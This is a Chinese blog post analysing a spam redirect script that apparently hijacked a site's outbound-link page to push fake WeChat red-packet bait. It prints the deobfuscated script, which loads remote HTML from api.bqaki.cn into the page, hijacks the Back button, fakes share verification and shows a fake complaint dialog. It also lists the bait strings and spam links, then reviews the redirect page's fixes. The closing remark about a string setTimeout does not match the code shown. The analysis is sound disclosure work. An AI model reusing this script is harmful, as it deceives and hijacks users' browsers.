} else if ((kHK103 > 191) && (kHK103 < 224)) {
c2 = utftext['charCodeAt'](IWh_LbK102 + 1);
qiz101 += window["String"]['fromCharCode'](((kHK103 & 31) << 6) | (c2 & 63));
IWh_LbK102 += 2
} else {
c2 = utftext['charCodeAt'](IWh_LbK102 + 1);
c3 = utftext['charCodeAt'](IWh_LbK102 + 2);
qiz101 += window["String"]['fromCharCode'](((kHK103 & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
IWh_LbK102 += 3
}
}
return qiz101
}
}
var hnFMtTus104 = window["Date"]['parse'](new window["Date"]()); // load timestamp, used as a cache-buster
// Fetches //api.bqaki.cn/loadIndex through jQuery ($ is the jquery 1.2.3 injected by the stage-2 page).
// code "0": the entire document is replaced by the server-supplied, unescaped `content`;
// any other code, or a transport error: redirect to a random window.adLink entry.
window['jump'] = function() {
$['ajax']({
type: "GET",
url: LHpJ8 + "loadIndex?source=1&t=" + hnFMtTus104,
dataType: "json",
data: {},
success: function(ZAr105) {
if (ZAr105 != null && ZAr105['code'] == "0") {
var De_Q106 = window["document"]['open']("text/html", "replace");
var O107 = window["unescape"](ZAr105['content']);
De_Q106['write'](O107);
De_Q106['close']();
} else {
modifyLocationHref(adLink);
console['log']("loadIndex", "code==1");
}
},
error: function(Assb108) {
modifyLocationHref(adLink);
console['log']("loadIndex", "error");
}
});
};
var A109 = false; // set once jump() has been attempted
// Hash change (e.g. the Back button after addADToHistory pushed "#pt_..."): the first time, jump();
// every later change redirects to adLink. `random() * 100 < 100` always holds.
window['onhashchange'] = function() {
var vVPPOzUC110 = ((window["Math"]['random']() * 100) < 100);
if (vVPPOzUC110 && !A109) {
A109 = true;
jump();
} else {
modifyLocationHref(adLink);
}
};

// Cancels touchmove on the body twice (property handler and listener), disabling scrolling.
function dissScroll() {
window["document"]['body']['ontouchmove'] = function(e) {
e['preventDefault']();
};
window["document"]['querySelector']('body')['addEventListener']('touchmove', function(gnHohw111) {
gnHohw111['preventDefault']();
});
}

// Name of the Page Visibility "hidden" property, trying the vendor-prefixed variants; null if unsupported.
function getHiddenProp() {
var oNT_KW112 = ['webkit', 'moz', 'ms', 'o'];
if ('hidden' in window["document"]) return 'hidden';
for (var Vg113 = 0; Vg113 < oNT_KW112['length']; Vg113++) {
if ((oNT_KW112[Vg113] + 'Hidden') in window["document"]) return oNT_KW112[Vg113] + 'Hidden';
}
return null;
}

// Name of the Page Visibility "visibilityState" property, with vendor prefixes; null if unsupported.
function getVisibilityState() {
var hipMW114 = ['webkit', 'moz', 'ms', 'o'];
if ('visibilityState' in window["document"]) return 'visibilityState';
for (var YXRL115 = 0; YXRL115 < hipMW114['length']; YXRL115++) {
if ((hipMW114[YXRL115] + 'VisibilityState') in window["document"]) return hipMW114[YXRL115] + 'VisibilityState';
}
return null;
}

// Current hidden state, or false when unsupported. Not called anywhere in this listing.
function isHidden() {
var TahY_IEcy116 = getHiddenProp();
if (!TahY_IEcy116) return false;
return window["document"][TahY_IEcy116];
}

// visibilitychange listener: calls the callback with hidden=false when the page became visible, true otherwise.
function onVisibilityChanged(SIT_117) {
if ("visible" == window["document"][getVisibilityState()]) {
onVisibilityChangedCallback(false);
} else {
onVisibilityChangedCallback(true);
}
}

// When the page becomes visible again (UdPg118 false) the visitor is treated as having shared:
// kRS12 is set, share_time is stored, and the "分享成功" dialog is shown. No share is actually
// verified — switching away from the page and coming back is enough.
function onVisibilityChangedCallback(UdPg118) {
if (!UdPg118) {
kRS12 = true;
setCookie("share_time", window["Date"]['parse'](new window["Date"]()));
show($K13['decode']("5YiG5Lqr5oiQ5Yqf"), $K13['decode']("5pyJM+S9jeWlveWPi+mihuWPluWQjiznuqLljIXoh6rliqjlrZjlhaXpkrHljIXjgII="), $K13['decode']("56Gu5a6a"));
}
}

// Registers onVisibilityChanged under the (possibly vendor-prefixed) visibilitychange event name
// derived from the hidden property name. Called from changeImg, i.e. after the first click.
function initVisibility() {
var FuGvynCvk119 = getHiddenProp();
if (FuGvynCvk119) {
var tPHgcepB120 = FuGvynCvk119['replace'](/[H|h]idden/, '') + 'visibilitychange';
window["document"]['addEventListener'](tPHgcepB120, onVisibilityChanged, false);
}
}

// No-op: the former body (kept inside the block comment) would have redirected to wx110Link ten
// minutes after share_time; `flag` and `wx110Link` are not defined anywhere in this listing.
function initShare() { /**var share_time = getCookie("share_time"); if(share_time==''||share_time == undefined || share_time == null||share_time==0) { return false; } if((Date.parse(new Date()) - share_time) > 10 * 60 * 1000) { (flag == 0) ? top.location.href = wx110Link: document.location.href = wx110Link; };**/
}

// Entry point. PCRd never redirects (see above), so the rest runs unconditionally:
// bait title, full-screen image page, history entry, scroll lock, dialog shell, complaint button.
function init() {
PCRd();
addTitle();
addBody();
historyADPage();
dissScroll();
dialogInit();
report();
};
init(); // runs as soon as mm.js is evaluated

代码量太多了不想分(装)(B)了,直接看效果。

尝试在本地的复现界面

本地复现

代码中的一些base64编码后的文字,解密

速点!
令人开心的时刻来了
速度!已有3位好友领取
人人免费领
土豪,就是如此任性
见者有份,来吧。
看了就归你了
点开,你就有份
别说话,点我!
看,收获时刻来了。
快没了!速看!
就要开始了,快!
这么好的活动,你竟然还不知道!
未分享到朋友圈,无法查看。
有3位好友领取后,红包自动存入钱包。
分享成功

几个链接

http://t.cn/Roji0oH
还原后,可能是已经屏蔽或者是其他链接
https://weixin110.qq.com/cgi-bin/mmspamsupport-bin/newredirectconfirmcgi?block_type=20&url=http%3A%2F%2Fbaidu.super%2Ftz.html&version=260506312&devicetype=android-223&lang=zh_CN&scene=1#wechat_redirect
解密得到
http://baidu.super/tz.html&version=260506312&devicetype=android-223&lang=zh_CN&scene=1#wechat_redirect
网站挂了,未找到.super相关的后缀,可能又是替换之类的,也未找到相关信息

微信屏蔽

比较有趣的是

// Markup of the "投诉成功" dialog from addDialog: built and shown by the page itself, styled with WeUI class names.
var kT65 = '<div class="weui-dialog__hd">' + '<strong class="weui-dialog__title">' + '<span style="color:red;">投诉成功</span></strong>' + '</div>' + '<div class="weui-dialog__bd">' + '我们已经收到您的投诉' + '</div>' + '<div class="weui-dialog__ft">' + '<a href="javascript:;" id="tousu" class="weui-dialog__btn primary">确定</a>' + '</div>';

猜测可能是利用相同的原理劫持微信投诉页面,来实现假投诉。从 addDialog/removeDialog 的代码看,这个“投诉成功”弹窗是页面自己用 WeUI 样式拼出来的,并没有经过微信的投诉流程;点“确定”只是写入 wx110 cookie,然后跳到 t.cn 短链。

@我是小马甲~说最终目的是跳转到菠菜网站,但我从代码中未看到,可能时间或是技术的问题。跳转目标本来就不写在静态代码里:DzaV22 和 adLink 来自 api.js 的 jsCallback 回调,jump() 写入的页面内容来自 api.bqaki.cn/loadIndex 接口,都是远程下发的,所以缓存的 mm.js 里看不到最终落地站。不过如有乐享被黑产搞了一波然后微信屏蔽链接倒是真的。

如有乐享之前的跳转已经看不到了,现在的说是解决了上一个漏洞问题,看下代码

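<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>如有乐享 - 外链跳转</title>
<meta name="Author" content="">
<meta name="Keywords" content="如有乐享,外链跳转">
<meta name="Description" content="如有乐享跳转外链网址专用页面">
</head>

<body>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 首页广告 -->
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2073396170871664" data-ad-slot="9635575110"
data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<a href="https://51.RUYO.net">返回首页</a><b><a id='atag' href="https://51.RUYO.net">点击这里跳转</a></b>,页面将在20秒后跳转......
<script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
<script src="//cdn.bootcss.com/Base64/1.0.1/base64.min.js"></script>
<script>
(function ($) {
// Reads one query-string parameter by name; null when absent.
// `name` is spliced into a RegExp unescaped — acceptable only because callers pass fixed literals ("u", "d").
$.getUrlParam = function (name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return decodeURI(decodeURI(r[2]));
return null;
};
})(jQuery);
// u = target address; d = target address, Base64-encoded.
// atob() is applied only when `d` is present: atob(null) is atob("null"), which returns a non-empty
// string, so the old `||` chain never reached the home-page default. A malformed `d` makes atob
// throw; that is caught so the page still falls through to the home redirect instead of stalling.
var dParam = $.getUrlParam("d");
var decoded = "";
if (dParam) {
try { decoded = atob(dParam); } catch (e) { decoded = ""; }
}
var u = $.getUrlParam("u") || decoded || "https://51.ruyo.net";
// Referrer host is compared exactly after parsing. The old substring test
// (indexOf("//51.RUYO.NET") > 0) also matched e.g. https://other.example/?x=//51.RUYO.NET.
// The Referer header is easily suppressed by the visitor's browser or privacy settings, so this is
// a weak control: it stops casual hot-linking of the redirector, not a determined abuser.
var refHost = "";
if (document.referrer) {
var refAnchor = document.createElement("a");
refAnchor.href = document.referrer;
refHost = refAnchor.hostname.toLowerCase();
}
// Only http(s) targets are accepted; javascript:, data: and any other scheme are rejected.
// The old prefix test (indexOf("HTTP") == 0) accepted any string that merely starts with "http".
if (/^https?:\/\//i.test(u) && refHost === "51.ruyo.net") {
document.getElementById("atag").href = u;
// A function callback, not a code string: setTimeout("...location.href='" + u + "'", ...) evaluated
// `u` as JavaScript source, so a quote character inside `u` could break out of the string literal.
setTimeout(function () { location.href = u; }, 20000);
} else {
location.href = "https://51.ruyo.net";
}
</script>
<script>
var _hmt = _hmt || [];
(function () {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?0bd90052898d11e61495657b34d773e3";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
</body>

</html>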

核心代码

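(function ($) {
// Reads one query-string parameter by name; null when absent.
// `name` is spliced into a RegExp unescaped — acceptable only because callers pass fixed literals ("u", "d").
$.getUrlParam = function (name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return decodeURI(decodeURI(r[2]));
return null;
};
})(jQuery);
/**
 * u = target address
 * d = target address, Base64-encoded
 */
// atob() is applied only when `d` is present: atob(null) is atob("null"), which returns a non-empty
// string, so the old `||` chain never reached the home-page default. A malformed `d` makes atob
// throw; that is caught so the page still falls through to the home redirect instead of stalling.
var dParam = $.getUrlParam("d");
var decoded = "";
if (dParam) {
try { decoded = atob(dParam); } catch (e) { decoded = ""; }
}
var u = $.getUrlParam("u") || decoded || "https://51.ruyo.net";
// document.referrer is the URL of the document that loaded this one. Its host is compared exactly
// after parsing: the old substring test (indexOf("//51.RUYO.NET") > 0) also matched e.g.
// https://other.example/?x=//51.RUYO.NET. The header is easily suppressed by browser/privacy
// settings, so this remains a weak control — it stops casual hot-linking, not a determined abuser.
var refHost = "";
if (document.referrer) {
var refAnchor = document.createElement("a");
refAnchor.href = document.referrer;
refHost = refAnchor.hostname.toLowerCase();
}
// Only http(s) targets are accepted; javascript:, data: and any other scheme are rejected.
// The old prefix test (indexOf("HTTP") == 0) accepted any string that merely starts with "http".
if (/^https?:\/\//i.test(u) && refHost === "51.ruyo.net") {
document.getElementById("atag").href = u;
// A function callback, not a code string: setTimeout("...location.href='" + u + "'", ...) evaluated
// `u` as JavaScript source, so a quote character inside `u` could break out of the string literal.
setTimeout(function () { location.href = u; }, 20000);
} else {
location.href = "https://51.ruyo.net";
}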

​ 之前的代码看不到,但就目前的代码来说可以吧,但是局限性也是有的,例如只能跳转http或者https的链接其他的不可以,也满足正常的用法。不过有一点还要注意:`setTimeout("javascript:location.href='" + u + "'", 20000)` 仍然是把 u 当代码字符串拼起来执行,u 里一个单引号就能闭合字符串,应改成函数形式 `setTimeout(function(){ location.href = u; }, 20000);`;另外 referrer 的子串匹配和 `indexOf("HTTP") == 0` 都只是弱校验。对比了下我目前所用的《HEXO下js实现外链跳转html-php页面效果代码》,支持各种下载链接等,虽说强大但也未必是件好事。各有千秋吧。

总结

​ 一开始看到的时候还是挺害怕的,毕竟自己也有相同功能的跳转页面,虽说启用前先做了下简单的测试,但还是有点心虚,毕竟人上有人,更何况这些黑产人员的经验远比我这搬砖小白高。正所谓功夫再高也怕菜刀。

​ 一个简简单单的跳转页面都能扯出这么多的东西来,网络安全不可忽视。

​ js的很多函数虽说认识但是解释起来怕说不清楚,也怕误导了看文章的人。所以都是引用菜鸟教程的原话,具有一定的参考价值。自己也重新认识了下。

参考